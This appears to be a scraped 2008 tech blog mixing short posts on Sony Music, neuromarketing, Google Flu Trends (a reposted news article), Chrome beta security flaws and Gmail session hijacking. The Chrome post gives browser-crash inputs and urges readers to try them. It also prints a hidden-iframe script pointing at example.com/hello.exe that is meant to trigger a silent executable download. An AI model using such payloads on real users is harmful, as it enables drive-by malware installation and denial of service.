Aha. Sony Music beweisst noch immer keinen vertraeglichen Umgang mit dem Internet gefunden zu haben

• The Early Adopter Song! (Part 3) – popula.de
• natadds Twitter Updates for 2008-05-04
• Mediamaster – save your music online and stream anywhere
• SoCal earthquake a powerful reminder of Twitter’s potential » VentureBeat

Falls Terroristen an ihr Fenster kommen, zeigen Sie Ihnen die kalte Schulter.

November 7th, 2007 Autor: ui. in wie man sich vor terroristischen anschlägen schützt |

via uiuiuiuiuiuiui.de

• Mopz Wanted “Mitternachtstraum”
• Google entwickelt Browser
• An inside view to who’s who in web2.0
• More Amazon S3 Downtime: How Much is Too Much? – ReadWriteWeb

Related articles by around the web:

• Scientology YouTube Video Channel Launches Meet a Scientologist Videos (prweb.com)
• New Church of Scientology Grand Opening In Washington, DC (prweb.com)

• NY Times: Google Uses Searches to Track Flu’s Spread
• Yes We Can – Barack Obama Music Video

Unser Gehirn erhält pro Sekunde von allen Sinnen etwa 11 Millionen Bits. Psychologe und Nobelpreisträger Daniel Kahnemann nennt dieses System das System 1: den Autopiloten (das Unterbewusstsein).

Nahezu grenzenlos kann es Informationen aufnehmen, nur einen minimalen Teil davon – zwischen 40 und 50 Bits – gib es an das System 2: den Piloten (das Bewusstsein) weiter.

via Neuromarketing – Auf der Suche nach dem Kaufknopf im Gehirn!.

• natadds Twitter Updates for 2008-05-02
• natadds Twitter Updates for 2008-05-29
• SoCal earthquake a powerful reminder of Twitter’s potential » VentureBeat
• Microsoft tries to one-up Google PageRank

Kapitaal typo-animation by the order of the Beyerd Museum. Kapitaal is an impression of the enormous amount of stimuli that we are harassed by every day. The amount is so big that its commercial effectiveness has become utterly dubious. Directors / animation : Ton Meijdam, Thom Snels, Béla Zsigmond

Related articles around the web:

• Create your own animated movies
• Art and Design Inspiration
• London in Stop Motion
• 30 inspiring Flickr groups on typography
• T-shirts for graphic designers

• Finally Famous
• lost twitter updates resurrected
• Mopz Wanted “Mitternachtstraum”
• Web 2.0 – Der Film

By MIGUEL HELFT for nytimes.com:

SAN FRANCISCO — There is a new common symptom of the flu, in addition to the usual aches, coughs, fevers and sore throats. Turns out a lot of ailing Americans enter phrases like “flu symptoms” into Google and other search engines before they call their doctors.

That simple act, multiplied across millions of keyboards in homes around the country, has given rise to a new early warning system for fast-spreading flu outbreaks, called Google Flu Trends.

Tests of the new Web tool from Google.org, the company’s philanthropic unit, suggest that it may be able to detect regional outbreaks of the flu a week to 10 days before they are reported by the Centers for Disease Control and Prevention.

In early February, for example, the C.D.C. reported that the flu cases had recently spiked in the mid-Atlantic states. But Google says its search data show a spike in queries about flu symptoms two weeks before that report was released. Its new service at google.org/flutrends analyzes those searches as they come in, creating graphs and maps of the country that, ideally, will show where the flu is spreading.

The C.D.C. reports are slower because they rely on data collected and compiled from thousands of health care providers, labs and other sources. Some public health experts say the Google data could help accelerate the response of doctors, hospitals and public health officials to a nasty flu season, reducing the spread of the disease and, potentially, saving lives.

“The earlier the warning, the earlier prevention and control measures can be put in place, and this could prevent cases of influenza,” said Dr. Lyn Finelli, lead for surveillance at the influenza division of the C.D.C. From 5 to 20 percent of the nation’s population contracts the flu each year, she said, leading to roughly 36,000 deaths on average.

The service covers only the United States, but Google is hoping to eventually use the same technique to help track influenza and other diseases worldwide.

“From a technological perspective, it is the beginning,” said Eric E. Schmidt, Google’s chief executive.

The premise behind Google Flu Trends — what appears to be a fruitful marriage of mob behavior and medicine — has been validated by an unrelated study indicating that the data collected by Yahoo, Google’s main rival in Internet search, can also help with early detection of the flu.

“In theory, we could use this stream of information to learn about other disease trends as well,” said Dr. Philip M. Polgreen, assistant professor of medicine and epidemiology at the University of Iowa and an author of the study based on Yahoo’s data.

Still, some public health officials note that many health departments already use other approaches, like gathering data from visits to emergency rooms, to keeping daily tabs on disease trends in their communities.

“We don’t have any evidence that this is more timely than our emergency room data,” said Dr. Farzad Mostashari, assistant commissioner of the Department of Health and Mental Hygiene in New York City.

If Google provided health officials with details of the system’s workings so that it could be validated scientifically, the data could serve as an additional, free way to detect influenza, said Dr. Mostashari, who is also chairman of the International Society for Disease Surveillance.

A paper on the methodology of Google Flu Trends is expected to be published in the journal Nature.

Researchers have long said that the material published on the Web amounts to a form of “collective intelligence” that can be used to spot trends and make predictions.

But the data collected by search engines is particularly powerful, because the keywords and phrases that people type into them represent their most immediate intentions. People may search for “Kauai hotel” when they are planning a vacation and for “foreclosure” when they have trouble with their mortgage. Those queries express the world’s collective desires and needs, its wants and likes.

Internal research at Yahoo suggests that increases in searches for certain terms can help forecast what technology products will be hits, for instance. Yahoo has begun using search traffic to help it decide what material to feature on its site.

Two years ago, Google began opening its search data trove through Google Trends, a tool that allows anyone to track the relative popularity of search terms. Google also offers more sophisticated search traffic tools that marketers can use to fine-tune ad campaigns. And internally, the company has tested the use of search data to reach conclusions about economic, marketing and entertainment trends.

“Most forecasting is basically trend extrapolation,” said Hal Varian, Google’s chief economist. “This works remarkably well, but tends to miss turning points, times when the data changes direction. Our hope is that Google data might help with this problem.”

Prabhakar Raghavan, who is in charge of Yahoo Labs and the company’s search strategy, also said search data could be valuable for forecasters and scientists, but privacy concerns had generally stopped it from sharing it with outside academics.

Google Flu Trends avoids privacy pitfalls by relying only on aggregated data that cannot be traced to individual searchers. To develop the service, Google’s engineers devised a basket of keywords and phrases related to the flu, including thermometer, flu symptoms, muscle aches, chest congestion and many others.

Google then dug into its database, extracted five years of data on those queries and mapped it onto the C.D.C.’s reports of influenzalike illness. Google found a strong correlation between its data and the reports from the agency, which advised it on the development of the new service.

“We know it matches very, very well in the way flu developed in the last year,” said Dr. Larry Brilliant, executive director of Google.org. Dr. Finelli of the C.D.C. and Dr. Brilliant both cautioned that the data needed to be monitored to ensure that the correlation with flu activity remained valid.

Google also says it believes the tool may help people take precautions if a disease is in their area.

Others have tried to use information collected from Internet users for public health purposes. A Web site called whoissick.org, for instance, invites people to report what ails them and superimposes the results on a map. But the site has received relatively little traffic.

HealthMap, a project affiliated with the Children’s Hospital Boston, scours the Web for articles, blog posts and newsletters to create a map that tracks emerging infectious diseases around the world. It is backed by Google.org, which counts the detection and prevention of diseases as one of its main philanthropic objectives.

But Google Flu Trends appears to be the first public project that uses the powerful database of a search engine to track a disease.

“This seems like a really clever way of using data that is created unintentionally by the users of Google to see patterns in the world that would otherwise be invisible,” said Thomas W. Malone, a professor at the Sloan School of Management at M.I.T. “I think we are just scratching the surface of what’s possible with collective intelligence.”

Related articles around the web

• Google Flu Tracker
• Why did investors freak out about Google?
• Google Use Search Trends to Track Flu Outbreak in the U.s.a
• Google Flu Trends

• Google
• Targeting: #Scientology
• Yes We Can – Barack Obama Music Video
• Google Chrome Vulnerabilities list

• natadds Twitter Updates for 2008-04-30
• SonyMusic und das Internet
• Yes We Can – Barack Obama Music Video
• Mood-dependent web radio

Less than a week after the release of Google (NSDQ:GOOG)’s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user’s computer.

The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the “Save As” function. If a user saves a Web page serving malicious content, the program could cause a stack-based overflow error, which could open the door for remote hackers to unleash malicious code on a user’s machine.

Remote attackers could then exploit the flaw by constructing a specially crafted Web page infused with malicious code. The attacker could then entice a victim to open and then save the infected page, which would subsequently download malicious code onto the victim’s computer and give the attacker complete access to the affected system.

Chrome’s latest buffer overflow vulnerability is one of about half a dozen errors detected in the newly released beta Web browser, about half of which allow for remote code execution, experts say. Another vulnerability, discovered shortly after the browser’s release Tuesday, included a carpetbombing glitch that stemmed from a fundamental flaw in the underlying user agent Safari 3.1.

However experts say that several Chrome beta version flaws are anticipated and will likely be worked out with the final version as the browser is subsequently tested.

“I think for a new product like Chrome, it doesn’t concern me much that they’re discovering the number of vulnerabilities and the details are getting out there. That’s the point of beta, especially open source beta,” said John Bambenek, handler for the SANS Internet Storm Center. “I think that the people who are really into getting exploits on a number of machines are not interested in messing with Chrome until (Google) gets some distribution out there.”

“If it’s not public information, the hackers don’t have it either,” he added.

And despite some errors that could lead to remote exploitation, experts say that because the browser is still in beta and not yet widely adopted, security threats for most users for the time being remains small.

“I don’t think the consumer impact is very large yet,” said Bambenek, “but that could change very quickly.”

Related articles from around the web:

• Critical Vulnerability Discovered in uTorrent
• Exploit for ‘extremely critical’ Yahoo Jukebox vuln goes wild
• Chrome: Already Topping Opera in Market Share
• Attack code targets new Adobe Flash vuln

• Google Chrome’s about: Pages
• lost twitter updates resurrected
• No Joke: Google Introduces Its Own Browser, With A Cartoon

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just “evil:%” in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it’s worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn’t need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I’m worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent’s used on its very first day.
The risk is high, fuzzers are still crunching…

Update:

Another Bug found.
< script > document.write(’< iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″ >’); < / script >

This script should (I haven’t tested it yet, will do it later) trigger a silent download on the client machine.

Related articles around the web:

• Google Chrome Browser EULA Shocking
• Google Chrome user agent
• Google Rewrites Questionable Chrome EULA

• Gmail Account Hacking Tool
• NY Times: Google Uses Searches to Track Flu’s Spread
• Google Chrome’s about: Pages
• lost twitter updates resurrected

Shared by natadd

Very important!! You should always use SSL (https://) for Gmail!

A tool that automatically steals IDs of non-encrypted sessions and breaks into Google Mail accounts has been presented at the Defcon hackers’ conference in Las Vegas.

Last week Google introduced a new feature in Gmail that allows users to permanently switch on SSL and use it for every action involving Gmail, and not only, authentication. Users who did not turn it on now have a serious reason to do so as Mike Perry, the reverse engineer from San Francisco who developed the tool is planning to release it in two weeks.

When you log in to Gmail the website sends a cookie (a text file) containing your session ID to the browser. This file makes it possible for the website to know that you are authenticated and keep you logged in for two weeks, unless you manually hit the sign out button. When you hit sign out this cookie is cleared.

Even though when you log in, Gmail forces the authentication over SSL (Secure Socket Layer), you are not secure because it reverts back to a regular unencrypted connection after the authentication is done. According to Google this behavior was chosen because of low-bandwidth users, as SLL connections are slower.

The problem lies with the fact that every time you access anything on Gmail, even an image, your browser also sends your cookie to the website. This makes it possible for an attacker sniffing traffic on the network to insert an image served from http://mail.google.com and force your browser to send the cookie file, thus getting your session ID. Once this happens the attacker can log in to the account without the need of a password. People checking their e-mail from public wireless hotspots are obviously more likely to get attacked than the ones using secure wired networks.

Perry mentioned that he notified Google about this situation over a year ago and even though eventually it made this option available, he is not happy with the lack of information. “Google did not explain why using this new feature was so important” he said. He continued and explained the implications of not informing the users, “This gives people who routinely log in to Gmail beginning with an https:// session a false sense of security, because they think they’re secure but they’re really not.”

If you are logging in to your Gmail account from different locations and you would like to benefit from this option only when you are using unsecured networks, you can force it by manually typing https://mail.google.com before you log in. This will access the SSL version of Gmail and it will be persistent over your entire session and not only during authentication.

Related articles around the web:

• SSL-encrypted Gmail not safe to ’sidejacking’ attacks, says researcher
• GMail hacking: it’s time to be more careful
• Google gives GMail always-on encryption
• Hackers create fake sites through Internet flaw

• Google Chrome Vulnerabilities list
• NY Times: Google Uses Searches to Track Flu’s Spread
• Google Chrome’s about: Pages
• lost twitter updates resurrected